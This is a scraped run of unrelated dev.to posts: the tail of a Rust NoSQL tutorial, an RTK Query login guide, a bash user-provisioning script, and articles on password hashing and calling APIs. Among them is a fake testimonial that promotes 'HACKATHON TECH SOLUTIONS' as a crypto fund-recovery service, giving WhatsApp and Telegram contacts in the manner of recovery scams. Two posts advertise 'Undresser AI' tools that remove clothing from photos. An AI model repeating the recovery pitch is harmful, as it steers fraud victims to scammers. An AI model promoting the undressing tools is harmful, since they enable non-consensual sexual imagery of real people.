the days of useless query language template like AWS velocity template language like honestly who though that was a good idea ? Anyway for our simple program i just put a bunch of operations in an enum and wallah ```rust #[derive(Debug, Clone)] pub enum Operator { Eq, Ne, Gt, Lt, Gte, Lte, In, Nin, } // very basic euals , not equals , greater than ,less than, grater than equal , Inside the array , not inside the array #[derive(Debug, Clone)] pub struct Condition { field: String, operator: Operator, value: Value, } #[derive(Debug, Clone)] pub struct Query { conditions: Vec<Condition>, } ``` Now for the final part to test out your own db . 
I'm not gonna lie, it's not a great experience yet: I still haven't created a library for talking to this DB easily, so you have to set some stuff up. First, create a function for initializing a new document:
```rust
fn create_test_document(name: &str, age: i64, city: &str) -> Document {
    let mut doc = Document::new();
    doc.insert("name".to_string(), Value::String(name.to_string()));
    doc.insert("age".to_string(), Value::Integer(age));
    doc.insert("city".to_string(), Value::String(city.to_string()));
    doc
}
```
Then you can use this function to add as much data as you want:
```rust
let db_path = Path::new("test.bin");
let mut storage = StorageEngine::new(db_path).unwrap();

let doc1 = create_test_document("Alice", 30, "New York");
let doc2 = create_test_document("Bob", 25, "San Francisco");
let doc3 = create_test_document("Charlie", 35, "New York");

storage
    .write(
        doc1.id().to_string().as_str(),
        &serde_json::to_vec(&doc1).unwrap(),
    )
    .expect("Failed to write doc1");
storage
    .write(
        doc2.id().to_string().as_str(),
        &serde_json::to_vec(&doc2).unwrap(),
    )
    .expect("Failed to write doc2");
storage
    .write(
        doc3.id().to_string().as_str(),
        &serde_json::to_vec(&doc3).unwrap(),
    )
    .expect("Failed to write doc3");
```
Judging by the performance tests I ran on my own computer, I'm hopeful this can become an actual thing someday. Even though I only created this as a fun project, I still have many things planned, so if you are interested and want to be a part of the project, just create a PR on GitHub. This was made solely for learning and understanding, so if you have any suggestions or complaints, you can raise them on GitHub as well. Here is the project link: [Github](https://github.com/arindam923/rust-nosql-db). Thank you for sticking around to the very end.
arindam_roy_382
1,912,123
Using Redux Toolkit Query to Create an Authentication API with ``injectEndpoints``
When working with modern web applications, managing API calls efficiently is crucial. Redux Toolkit...
0
2024-07-05T01:41:25
https://dev.to/forhad96/using-redux-toolkit-query-to-create-an-authentication-api-with-injectendpoints-2h57
When working with modern web applications, managing API calls efficiently is crucial. Redux Toolkit Query (RTK Query) simplifies this process by providing powerful tools to define and interact with your APIs. In this blog post, we will explore how to use RTK Query to create an authentication API, focusing on the **`injectEndpoints`** method. Additionally, we'll cover how to handle cookies for session management and provide a crucial tip about enabling CORS. ## Setting Up Your Base API First, let's set up your base API using RTK Query. This base API is where you will inject your endpoints. ```javascript import { createApi, fetchBaseQuery } from "@reduxjs/toolkit/query/react"; export const baseApi = createApi({ reducerPath: "baseApi", baseQuery: fetchBaseQuery({ baseUrl: "http://localhost:5000/api/v1", credentials: "include", // Ensure cookies are included in requests }), endpoints: () => ({}), }); ``` ## Injecting Endpoints To manage authentication, we will inject an endpoint for the login function. This is done using the **`injectEndpoints`** method provided by RTK Query. ```javascript import { baseApi } from "../../api/baseApi"; const authApi = baseApi.injectEndpoints({ endpoints: (builder) => ({ login: builder.mutation({ query: (userInfo) => ({ url: "/auth/login", method: "POST", body: userInfo, }), }), }), }); export const { useLoginMutation } = authApi; ``` In this example: - We call **`injectEndpoints`** on our `baseApi`. - Inside **`injectEndpoints`**, we define our endpoints using a function that receives a `builder` object. - We use `builder.mutation` to define a `login` mutation. This mutation sends a `POST` request to the `/auth/login` endpoint with the user information as the body. ## Using the Login Mutation in Your Component With the endpoint defined, you can now use the `useLoginMutation` hook in your React components to perform login actions. ```javascript import React, { useState } from 'react'; import { useLoginMutation } from './path-to-your-api-file'; const Login = () => { const [login, { isLoading, isError, isSuccess, data }] = useLoginMutation(); const [userInfo, setUserInfo] = useState({ username: '', password: '' }); const handleLogin = async () => { try { await login(userInfo).unwrap(); // handle successful login } catch (error) { // handle login error } }; return ( <div> <input type="text" placeholder="Username" value={userInfo.username} onChange={(e) => setUserInfo({ ...userInfo, username: e.target.value })} /> <input type="password" placeholder="Password" value={userInfo.password} onChange={(e) => setUserInfo({ ...userInfo, password: e.target.value })} /> <button onClick={handleLogin} disabled={isLoading}> {isLoading ? 'Logging in...' : 'Login'} </button> {isError && <p>Error logging in</p>} {isSuccess && <p>Login successful</p>} </div> ); }; export default Login; ``` In this component: - We use the `useLoginMutation` hook to get the `login` function and its state. - We manage user input using `useState`. - When the login button is clicked, we call the `login` function with the user information. ## Important Tip: Enable CORS on the Backend One common mistake beginners make is forgetting to enable Cross-Origin Resource Sharing (CORS) on the backend. CORS is essential when your frontend and backend are hosted on different domains or ports. Without it, your frontend will not be able to communicate with your backend, leading to errors. 
### Example of Enabling CORS in Node.js with Express To enable CORS in an Express application, you can use the `cors` middleware: ```javascript const express = require('express'); const cors = require('cors'); const app = express(); app.use(cors({ origin: 'http://localhost:3000', // Adjust this to your frontend's URL credentials: true, // This allows cookies to be included in requests })); ``` Make sure to adjust the `origin` to match your frontend's URL and set `credentials` to `true` to allow cookies. ## Conclusion RTK Query makes it straightforward to manage API calls in your Redux application. By using **`injectEndpoints`**, you can easily define and use endpoints for various API operations, including authentication. Handling cookies during the login process ensures secure and persistent sessions, enhancing user experience. Remember to enable CORS on your backend to avoid common issues with cross-origin requests. --- This blog post provides a quick overview of setting up an authentication API using RTK Query, handling cookies for session management, and the importance of enabling CORS. For more advanced use cases and configurations, refer to the [Redux Toolkit Query documentation](https://redux-toolkit.js.org/rtk-query/overview).
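### Going Further: Injecting More Session Endpoints

The same `injectEndpoints` pattern extends naturally to other authentication calls. Below is a minimal, illustrative sketch of how a profile query and a logout mutation could be injected into the same `baseApi`; the `/auth/me` and `/auth/logout` paths are assumptions for illustration and should be adjusted to match your backend. These endpoints could equally be added alongside the `login` endpoint in the earlier call.

```javascript
import { baseApi } from "../../api/baseApi";

const sessionApi = baseApi.injectEndpoints({
  endpoints: (builder) => ({
    // Hypothetical endpoint: fetch the currently logged-in user.
    // The session cookie is sent automatically because the base query
    // was configured with credentials: "include".
    getMe: builder.query({
      query: () => ({
        url: "/auth/me", // assumed path for illustration
        method: "GET",
      }),
    }),
    // Hypothetical endpoint: clear the session on the server.
    logout: builder.mutation({
      query: () => ({
        url: "/auth/logout", // assumed path for illustration
        method: "POST",
      }),
    }),
  }),
});

// RTK Query auto-generates hooks from the endpoint names.
export const { useGetMeQuery, useLogoutMutation } = sessionApi;
```

In a component, `useGetMeQuery()` fires on mount and reuses the cookie-based session, which pairs well with the login flow shown above.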
forhad96
1,912,122
RECOVER MONEY FROM BITCOIN AND USDT SCAM BY CONTACTING HACKATHON TECH SOLUTIONS
In the realm of online finance, where deceit often masquerades as opportunity and treachery lurks in...
0
2024-07-05T01:41:11
https://dev.to/sophia_stephen_2f0e4ee571/recover-money-from-bitcoin-and-usdt-scam-by-contacting-hackathon-tech-solutions-3jhp
bitcoin, cryptocurrency, ethereum
In the realm of online finance, where deceit often masquerades as opportunity and treachery lurks in the shadows, discovering a bastion of trust and competence feels akin to unearthing a priceless gem amidst a desolate wasteland. Such a sanctuary, for me, materialized in the form of HACKATHON TECH SOLUTIONS. My odyssey toward HACKATHON TECH SOLUTIONS commenced with a bitter taste of disillusionment, as a once-promising investment endeavor soured into a nightmare of denied withdrawals and dubious conduct. Driven to desperation, I sought recourse from official channels, only to find my entreaties met with indifference, my hope waning with each fruitless plea. Alone and disillusioned, I sought refuge in the boundless expanse of the internet, scouring its depths for a glimmer of salvation amidst the cacophony of cautionary tales. It was amidst this digital labyrinth that the name HACKATHON TECH SOLUTIONS emerged as a beacon of hope, its reputation for integrity, and efficacy standing tall amidst the cacophony of dubious offerings. Entranced by the assurances of their ethical approach and sterling reputation, I took a leap of faith and reached out to their team. From the outset, it was evident that HACKATHON TECH SOLUTIONS was no ordinary firm. Their professionalism and commitment to excellence were palpable, instilling in me a newfound sense of confidence in the face of adversity. But trust, as they say, is a currency earned through deeds, not words. And earn it they did, with each meticulously planned step of the recovery process executed with precision and finesse. Their dedication to ethical practices and unwavering focus on client satisfaction set them apart in a landscape fraught with deceit and uncertainty. As the days turned into weeks and the weeks into months, I marveled at the tenacity and skill with which HACKATHON TECH SOLUTIONS pursued my case. Their resolve never faltered, their determination unwavering in the face of adversity. And then, like a phoenix rising from the ashes, my fortunes began to shift. With each successful recovery, a burden was lifted from my shoulders, replaced by a renewed sense of optimism and possibility. The funds they restored to me were not merely numbers on a screen; they were a lifeline, a beacon of hope in a sea of uncertainty. But their impact extended beyond mere financial restitution. With the recovered funds in hand, I was empowered to settle my debts and pursue my aspirations with newfound vigor. What was once a distant dream blossomed into reality as I embarked on a journey to realize my entrepreneurial ambitions, buoyed by the unwavering support and guidance of the HACKATHON TECH SOLUTIONS team. HACKATHON TECH SOLUTIONS proved to be more than just a solution to my financial predicament; they were a lifeline in a tempest-tossed sea, a guiding light illuminating the path to redemption. To those navigating the perilous waters of online finance, I offer but one piece of advice: place your trust in HACKATHON TECH SOLUTIONS. For they are not merely experts in their field; they are paragons of integrity and guardians of hope in an ever-evolving digital landscape.Reach out to HACKATHON TECH SOLUTIONS via below contact details Email: {[email protected]} Website:[https://hackathontechsolutions.com) Whatsapp: {+31 6 47999256} Telegram: {@hackathontechsolution} OR {+31 6 47999256 }
sophia_stephen_2f0e4ee571
1,912,121
Bash Script Automation for User and Group Management in Linux
Managing user onboarding in a corporate environment can be complex, especially with a large influx of...
0
2024-07-05T01:40:14
https://dev.to/peewells/bash-script-automation-for-user-and-group-management-in-linux-54c6
webdev, bash, automation, devops
Managing user onboarding in a corporate environment can be complex, especially with a large influx of new employees. Manual assignment of users to directories, groups, and configuring permissions can lead to errors and consume valuable time. To streamline this process and ensure efficient onboarding, I've developed a Bash script that automates these tasks, providing a seamless deployment solution. **Overview of the Script ** The Bash script automates several critical tasks: - User and Group Management: Reads user details from an input file, creates user accounts, and manages groups as specified. - Password Management: Generates random passwords securely stored in /var/secure/user_passwords.txt with appropriate permissions. - Logging: Records all script actions, including successes and errors, in /var/log/user_management.log for auditing purposes. **THE SCRIPT ** ``` #!/bin/bash # Log file and secure passwords file LOGFILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.txt" # Ensure the log file and secure passwords file exist with correct permissions sudo mkdir -p /var/secure sudo touch "$PASSWORD_FILE" sudo chmod 600 "$PASSWORD_FILE" sudo touch "$LOGFILE" sudo chmod 600 "$LOGFILE" # Function to generate a random password generate_password() { openssl rand -base64 12 } # Check if openssl is installed if ! command -v openssl &> /dev/null; then echo "openssl is required but not installed. Please install it and try again." >&2 exit 1 fi # Read the input file line by line while IFS=';' read -r username groups; do # Remove any leading or trailing whitespace username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) # Create a personal group with the same name as the username if ! getent group "$username" > /dev/null 2>&1; then if sudo groupadd "$username"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - Group '$username' created." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error creating group '$username'." >> "$LOGFILE" continue fi else echo "$(date '+%Y-%m-%d %H:%M:%S') - Group '$username' already exists." >> "$LOGFILE" fi # Create the user if it does not exist if ! id -u "$username" > /dev/null 2>&1; then if sudo useradd -m -s /bin/bash -g "$username" "$username"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - User '$username' created." >> "$LOGFILE" # Generate a random password for the user password=$(generate_password) echo "$username:$password" | sudo chpasswd echo "$username:$password" | sudo tee -a "$PASSWORD_FILE" > /dev/null # Set ownership and permissions for the user's home directory sudo chown "$username":"$username" "/home/$username" sudo chmod 700 "/home/$username" echo "$(date '+%Y-%m-%d %H:%M:%S') - Password for '$username' set and stored securely." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error creating user '$username'." >> "$LOGFILE" continue fi else echo "$(date '+%Y-%m-%d %H:%M:%S') - User '$username' already exists." >> "$LOGFILE" fi # Add user to additional groups IFS=',' read -ra group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo "$group" | xargs) if ! getent group "$group" > /dev/null 2>&1; then if sudo groupadd "$group"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - Group '$group' created." >> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error creating group '$group'." >> "$LOGFILE" continue fi fi if sudo usermod -aG "$group" "$username"; then echo "$(date '+%Y-%m-%d %H:%M:%S') - User '$username' added to group '$group'." 
>> "$LOGFILE" else echo "$(date '+%Y-%m-%d %H:%M:%S') - Error adding user '$username' to group '$group'." >> "$LOGFILE" fi done done < "$1" echo "User creation process completed." exit 0 ``` **Script Breakdown ** ``` #!/bin/bash # Log file and secure passwords file LOGFILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.txt" # Ensure the log file and secure passwords file exist with correct permissions sudo mkdir -p /var/secure sudo touch "$PASSWORD_FILE" sudo chmod 600 "$PASSWORD_FILE" sudo touch "$LOGFILE" sudo chmod 600 "$LOGFILE" # Function to generate a random password generate_password() { openssl rand -base64 12 } # Check if openssl is installed if ! command -v openssl &> /dev/null; then echo "openssl is required but not installed. Please install it and try again." >&2 exit 1 fi # Read the input file line by line while IFS=';' read -r username groups; do # Remove any leading or trailing whitespace username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) ``` **Initialization and File Setup ** Purpose: Sets up necessary files (user_passwords.txt and user_management.log) with secure permissions. Explanation: Creates directories and files if they don't exist, ensuring only privileged access (600 permissions) for security. ``` # Function to generate a random password generate_password() { openssl rand -base64 12 } ``` Random Password Generation: Purpose: Provides a function to create strong, random passwords for new user accounts. Explanation: Uses OpenSSL to generate a 12-character random password encoded in base64 format, ensuring security and complexity for user accounts. ``` # Check if OpenSSL is installed if ! command -v openssl &> /dev/null; then echo "Error: OpenSSL is required but not installed. Please install it and try again." >&2 exit 1 fi ``` **Dependency Check (OpenSSL): ** Purpose: Ensures the script can use OpenSSL for generating passwords securely. Explanation: Checks if OpenSSL is installed (command -v openssl &> /dev/null). If not, it outputs an error message and stops script execution, ensuring all dependencies are met before proceeding. ``` # Process each line from the input file while IFS=';' read -r username groups; do # Trim whitespace from username and groups username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) ``` **Input Processing (User and Group Management): ** Purpose: Reads user details from an input file, cleans up whitespace, and manages user and group creation. Explanation: Reads each line of the input file, splitting data into username and groups. It trims any leading or trailing whitespace (xargs), preparing data for user and group management tasks. **To successfully run this script, follow these steps: ** Ensure the script is Executable: `chmod +x create_users.sh` Run the Script with Sudo: `sudo ./create_users.sh` Reading the Input File (users.txt): The script reads each line from the input file containing usernames and groups separated by a semicolon. Multiple groups are separated by commas. Example Input File (users.txt): ``` light; sudo,dev,www-data idimma; sudo mayowa; dev,www-data ``` Note: This input creates users Light,idimma, and Mayowa assigning them to the specified groups. **Conclusion ** In conclusion, this Bash script exemplifies how automation simplifies complex tasks such as user and group management in Linux environments. By leveraging shell scripting, administrators can achieve consistency, security, and efficiency across system deployments. 
For places where you can grow your tech skills and get hands-on projects, please visit: https://hng.tech/internship or https://hng.tech/hire
peewells
1,912,120
How to store password in Database
Storing passwords securely in a database is critical for maintaining the integrity and security of a...
0
2024-07-05T01:37:00
https://dev.to/zeeshanali0704/how-to-store-password-in-database-bbh
systemdesign, javascript, systemdesignwithzeeshanali
Storing passwords securely in a database is critical for maintaining the integrity and security of a system. Here are key methods and best practices for password storage in terms of system design: ### 1. **Use Strong Hashing Algorithms** - **Hashing**: Store the hashed version of the password instead of the plaintext password. Use strong, cryptographic hashing algorithms like: - **bcrypt**: Designed specifically for hashing passwords and includes a salt automatically. - **Argon2**: The winner of the Password Hashing Competition (PHC), designed to resist GPU cracking. - **PBKDF2**: Uses a pseudorandom function (such as HMAC) and is configurable to be slow. ### 2. **Salting Passwords** - **Salting**: Add a unique, random salt to each password before hashing to prevent rainbow table attacks. - Ensure each password is concatenated with a unique, random string (salt) before hashing. Store the salt in the database alongside the hashed password. ### 3. **Pepper** - **Peppering**: Add a static secret value (pepper) to all passwords before hashing. The pepper should be kept secret and stored separately from the database, often in application code or environment variables. ### Key Outcomes - Choose hashing algorithms that are intentionally slow (like bcrypt, Argon2, or PBKDF2) to make brute-force attacks more difficult. - Use techniques like PBKDF2, bcrypt, or Argon2, which internally apply the hashing function multiple times to increase computation time. - Store salts in the same database table as the hashed passwords. Salts do not need to be secret but should be unique per password. - Ensure your database and application environment are secure: Use HTTPS for data transmission. Apply database access controls and encryption. Regularly update and patch systems to fix vulnerabilities. - Conduct regular security audits and code reviews to ensure password storage and handling follow best practices. ### Conclusion Implementing these methods ensures that even if an attacker gains access to the database, the passwords remain protected. Proper hashing, salting, and environment security practices are fundamental to secure password storage in system design. More Details: Get all articles related to system design Hastag: SystemDesignWithZeeshanAli Git: https://github.com/ZeeshanAli-0704/SystemDesignWithZeeshanAli
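To make the hashing and salting advice concrete, here is a minimal Node.js sketch using the `bcrypt` npm package; the cost factor of 12 and the function names are illustrative assumptions rather than a prescribed implementation:

```
// Minimal sketch: hashing and verifying passwords with bcrypt.
// The generated salt is embedded in the returned hash string, so only one
// column needs to be stored per user.
const bcrypt = require('bcrypt');

const SALT_ROUNDS = 12; // illustrative cost factor; tune it for your hardware

async function hashPassword(plainTextPassword) {
  // Generates a random salt and returns a string like "$2b$12$<salt><hash>"
  return bcrypt.hash(plainTextPassword, SALT_ROUNDS);
}

async function verifyPassword(plainTextPassword, storedHash) {
  // Re-hashes the candidate using the salt embedded in storedHash and compares
  return bcrypt.compare(plainTextPassword, storedHash);
}

// Hypothetical usage
(async () => {
  const hash = await hashPassword('correct horse battery staple');
  console.log(await verifyPassword('correct horse battery staple', hash)); // true
  console.log(await verifyPassword('wrong guess', hash));                  // false
})();
```

Because bcrypt embeds the generated salt inside the hash string it returns, storing that single string per user is enough; a pepper, if you use one, would be applied to the password before these calls and kept outside the database, for example in an environment variable.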
zeeshanali0704
1,912,119
How to Call an API in JavaScript
How to Call an API in JavaScript Calling an API (Application Programming Interface) in JavaScript...
0
2024-07-05T01:23:05
https://dev.to/mibii/how-to-call-an-api-in-javascript-31oj
javascript, api, programming, beginners
How to Call an API in JavaScript Calling an API (Application Programming Interface) in JavaScript involves a few straightforward steps. Here’s a detailed guide to help you understand and implement API calls using various methods: ## Steps to Call an API 1. Send an HTTP Request to the API Endpoint: Use a library like: - XMLHttpRequest (XHR): The traditional way to send HTTP requests. - fetch(): The modern, promise-based way to send HTTP requests. - Axios: A popular promise-based HTTP client. 2. Specify the Request Method: Methods include GET, POST, PUT, DELETE, etc. 3. Pass Data to the API (if required): For methods like POST and PUT, you might need to send data in the request body. 4. Handle the Response Data: Process the data returned from the API and handle any errors. ## Example Using fetch() The fetch() function is a modern way to make HTTP requests. Here’s an example of how to use it: ``` fetch('https://api.example.com/data') .then(response => { if (!response.ok) { throw new Error('Network response was not ok ' + response.statusText); } return response.json(); }) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` Explanation: fetch('https://api.example.com/data'): Sends a GET request to the API endpoint. response.ok: Checks if the response status is OK (status code 200-299). response.json(): Parses the response as JSON. console.log(data): Logs the parsed data to the console. catch(error => console.error('Error:', error)): Catches and logs any errors. ## Example Using Axios Axios is a promise-based HTTP client that provides an easy-to-use API. Here’s how to use Axios to make an API call: ``` axios.get('https://api.example.com/data') .then(response => console.log(response.data)) .catch(error => console.error('Error:', error)); ``` Explanation: axios.get('https://api.example.com/data'): Sends a GET request to the API endpoint. response.data: Accesses the data from the response. catch(error => console.error('Error:', error)): Catches and logs any errors. ## Important Tips Replace the API Endpoint URL: Make sure to replace https://api.example.com/data with the actual URL of the API you're trying to call. Handling Different HTTP Methods: For methods like POST, PUT, DELETE, you’ll need to adjust the request method and possibly the data payload. ``` // Example of a POST request using fetch() fetch('https://api.example.com/data', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ key: 'value' }), }) .then(response => response.json()) .then(data => console.log(data)) .catch(error => console.error('Error:', error)); ``` ``` // Example of a POST request using Axios axios.post('https://api.example.com/data', { key: 'value' }) .then(response => console.log(response.data)) .catch(error => console.error('Error:', error)); ``` ## Conclusion Calling an API in JavaScript is essential for fetching and sending data. By understanding how to use libraries like fetch() and Axios, you can effectively interact with APIs to build dynamic and responsive applications. Always ensure you handle errors gracefully and use the appropriate HTTP methods for your API interactions.
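As a complement to the examples above, the same GET request can be written with async/await, which many developers find easier to read; below is a minimal sketch (the endpoint URL remains a placeholder):

```
// Example of a GET request using fetch() with async/await
async function getData() {
  try {
    const response = await fetch('https://api.example.com/data');
    if (!response.ok) {
      throw new Error('Network response was not ok ' + response.statusText);
    }
    const data = await response.json();
    console.log(data);
    return data;
  } catch (error) {
    console.error('Error:', error);
  }
}

getData();
```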
mibii
1,912,117
What is the difference between SDK, JDK, OpenJDK, JRE, JVM, and the Java compiler in the Java platform?
What is the difference between SDK, JDK, OpenJDK, JRE, JVM, and the Java compiler in the Java platform?
0
2024-07-05T01:19:57
https://dev.to/grenierdudev/what-is-the-difference-between-sdk-jdk-openjdk-jre-jvm-java-compiler-in-java-platform--3d71
java, jvm, javac
[What is the difference between SDK, JDK, OpenJDK, JRE, JVM, and the Java compiler in the Java platform?](https://grenierdudev.com/posts/what-is-the-difference-between-sdk-jdk-openjdk-jre-jvm-java-compiler-in-java-platform-2d42e37)
grenierdudev
1,912,116
What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part C
What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part C
0
2024-07-05T01:16:15
https://dev.to/grenierdudev/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-c-2nfg
webassembly, rust, cpp, javascript
[What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part C](https://grenierdudev.com/posts/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-c-1009bf7)
grenierdudev
1,912,115
What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part B
What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part B
0
2024-07-05T01:15:14
https://dev.to/grenierdudev/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-b-1k01
webassembly, rust, cpp, javascript
[What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part B](https://grenierdudev.com/posts/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-b-17cfc10)
grenierdudev
1,912,114
What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part A
What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part A
0
2024-07-05T01:14:02
https://dev.to/grenierdudev/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-a-4aag
webassembly, rust, cpp, javascript
[What is Wasm or WebAssembly? Learn WebAssembly Basics with Rust, Part A](https://grenierdudev.com/posts/what-is-wasm-or-webassembly-learn-webassembly-basics-with-rust-part-a-26ea079)
grenierdudev
1,912,113
What is the cost of implementing Undresser AI?
Artificial intelligence (AI) has become an integral part of various industries, driving efficiency,...
0
2024-07-05T01:13:53
https://dev.to/guestposts/what-is-the-cost-of-implementing-undresser-ai-3528
ai, webtesting
Artificial intelligence (AI) has become an integral part of various industries, driving efficiency, innovation, and enhanced user experiences. Among the many applications of AI, one controversial and highly specialized area is "Undresser AI," a technology designed to digitally remove clothing from images of people. While this technology raises significant ethical concerns, it also entails various costs associated with its implementation. This article delves into the financial, technical, and ethical costs of implementing Undresser AI. ## Financial Costs ### Development and Integration The initial financial cost of implementing **[Undresser AI](https://undresser.ai/ai-undress/)** is substantial. Developing such an AI requires a team of skilled software engineers, data scientists, and AI specialists. The cost of hiring these professionals can be high, with salaries varying significantly based on location and experience. Additionally, the development process involves extensive research, design, and testing phases, all of which require substantial investment. Integrating Undresser AI into existing systems or platforms also incurs costs. This includes the expenses related to software and hardware upgrades, as well as the costs of training staff to use the new technology. Companies might also need to invest in cloud services or high-performance computing infrastructure to handle the AI’s processing needs efficiently. ### Data Acquisition and Management Training an AI model to undress individuals digitally requires a massive dataset of images. Acquiring such data, especially in an ethical and legal manner, can be costly. Companies may need to purchase datasets, which can range from thousands to millions of dollars, depending on the volume and quality of the data. Data management costs include storage, processing, and ensuring compliance with data protection regulations such as GDPR. Proper data handling practices must be in place to avoid legal repercussions, adding to the overall expense. ## Technical Costs ### Computational Resources The computational resources required to develop and run Undresser AI are significant. Training complex neural networks involves high-powered GPUs and extensive computational time. The costs of these resources can add up quickly, especially if the AI model needs to be continuously updated and improved. Running the AI in real-time applications also demands substantial computational power. For instance, if a company wants to implement this AI in a mobile application, the processing must be efficient enough to ensure smooth user experiences, necessitating further investment in optimization and computational resources. ### Maintenance and Upgrades Once implemented, Undresser AI requires ongoing maintenance and upgrades. AI models need regular updates to improve accuracy, incorporate new data, and address any discovered biases or errors. This continual improvement process requires a dedicated team and ongoing financial investment. Additionally, as technology evolves, the hardware and software supporting the AI will need periodic upgrades to maintain optimal performance. These upgrades come with their own set of costs, including potential downtime and disruption during the implementation of new systems. ## Ethical Costs ### Privacy and Consent The most significant non-financial cost of implementing Undresser AI is the ethical dilemma it presents. The technology inherently raises serious privacy concerns. 
Digitally undressing individuals without their explicit consent is a gross invasion of privacy and can lead to severe psychological and social consequences for the victims. Implementing such technology responsibly necessitates robust consent mechanisms, ensuring that individuals are fully aware of and agree to the use of their images in this manner. Developing and enforcing these consent protocols can be complex and costly, both in terms of time and resources. ### Legal and Reputational Risks The legal implications of Undresser AI are profound. Unauthorized use of this technology can lead to significant legal repercussions, including lawsuits and fines. Companies must navigate a complex web of regulations and ensure compliance with privacy laws to avoid legal trouble. Beyond legal risks, there is the potential for severe reputational damage. Public backlash against companies using **[Undresser AI](https://undresser.ai/ai-undress/)** can be intense, leading to loss of customer trust and business opportunities. Managing this risk requires a careful and transparent approach, including robust public relations strategies and ethical guidelines. ## Conclusion The cost of implementing Undresser AI extends far beyond financial expenditure. While the development, integration, and maintenance of this technology require substantial investment, the ethical and reputational costs are equally significant. Companies must weigh these factors carefully, considering not only the monetary implications but also the broader societal impact. Responsible implementation, adherence to legal frameworks, and ethical considerations are paramount to navigating the complex landscape of Undresser AI.
guestposts
1,912,111
What are the Limitations of "Undressing AI" in Terms of Dress Removal?
Artificial Intelligence (AI) has made significant strides in various fields, from healthcare to...
0
2024-07-05T01:10:52
https://dev.to/guestposts/what-are-the-limitations-of-undressing-ai-in-terms-of-dress-removal-168b
machinelearning, webdev
Artificial Intelligence (AI) has made significant strides in various fields, from healthcare to finance, and even in creative domains like art and fashion. One controversial and ethically problematic application of AI is "Undressing AI," a term used to describe AI tools designed to simulate the removal of clothing from images of people. Despite advancements in machine learning and image processing, these tools come with numerous limitations and ethical concerns that need to be thoroughly understood. ## Technical Limitations ### Accuracy and Realism One of the primary technical limitations of **[undressing AI](https://porngen.art/undress-ai/)** is the lack of accuracy and realism in the generated images. Even the most advanced AI models struggle to produce images that convincingly depict the removal of clothing while maintaining anatomical accuracy. The AI often generates unrealistic body proportions, skin textures, and lighting inconsistencies that make the output appear unnatural and fabricated. ### Data Dependency Undressing AI relies heavily on large datasets of images for training. These datasets must include a wide variety of body types, skin tones, and clothing styles to ensure the AI can generalize well. However, obtaining such diverse and comprehensive datasets is challenging and often impractical. This limitation leads to biased outputs where the AI performs well on certain demographics while failing miserably on others. ### Ethical Data Collection The process of collecting data for training undressing AI is fraught with ethical dilemmas. Gathering images of people, especially without their consent, for the purpose of developing such tools is a significant invasion of privacy. Furthermore, the use of these images can perpetuate harmful stereotypes and objectification, raising serious ethical concerns about the technology's implications. ## Ethical and Moral Concerns ### Consent and Privacy The most glaring ethical issue with undressing AI is the violation of consent and privacy. Using AI to remove clothing from images without the subject's permission is a gross invasion of privacy and can cause significant emotional and psychological harm to the individuals depicted. This misuse of technology can lead to a range of negative consequences, from personal embarrassment to severe mental health issues. ### Objectification and Exploitation Undressing AI exacerbates the objectification and exploitation of individuals, particularly women. By creating tools that strip away clothing, the technology contributes to a culture that values people based on their physical appearance and reduces them to mere objects of visual gratification. This can have far-reaching implications for societal attitudes towards body image and respect for personal boundaries. ### Legal Implications The use of undressing AI can lead to various legal ramifications. Creating and distributing manipulated images without consent can be considered a form of harassment or defamation, subjecting individuals to unwanted exposure and potential blackmail. Many jurisdictions have laws against non-consensual pornography and image-based abuse, and the development and use of undressing AI could potentially fall under these legal frameworks. ## Technical Safeguards and Limitations ### Detection and Prevention To combat the misuse of **[undressing AI](https://porngen.art/undress-ai/)**, there have been efforts to develop tools that can detect and prevent the distribution of manipulated images. 
These tools analyze images for signs of tampering and can flag content that appears to have been altered using AI. However, the effectiveness of these safeguards is limited, as the technology to detect deepfakes and other AI-generated content is still in its infancy and often lags behind the methods used to create such content. ### Responsible AI Development Ensuring responsible development and deployment of AI technologies is crucial to mitigating the risks associated with undressing AI. This includes establishing strict ethical guidelines for data collection, implementing robust consent mechanisms, and fostering transparency in AI development processes. However, achieving these goals is challenging, given the rapid pace of AI advancement and the diverse range of stakeholders involved. ## Conclusion While the technological advancements in AI continue to push boundaries, the development of undressing AI highlights significant limitations and ethical challenges. The inaccuracies, ethical concerns, and potential for misuse of this technology underscore the need for stringent safeguards and responsible AI development practices. As society navigates the complexities of AI, it is crucial to prioritize respect for individual privacy and ethical considerations to ensure that such powerful tools are used for beneficial purposes rather than harmful exploitation.
guestposts
1,912,497
How to try experimental CSS features
I love that browsers are now shipping new CSS features that may not necessarily have been fully baked...
0
2024-07-05T09:31:12
https://chenhuijing.com/blog/how-to-try-experimental-css-features/
css, webdev
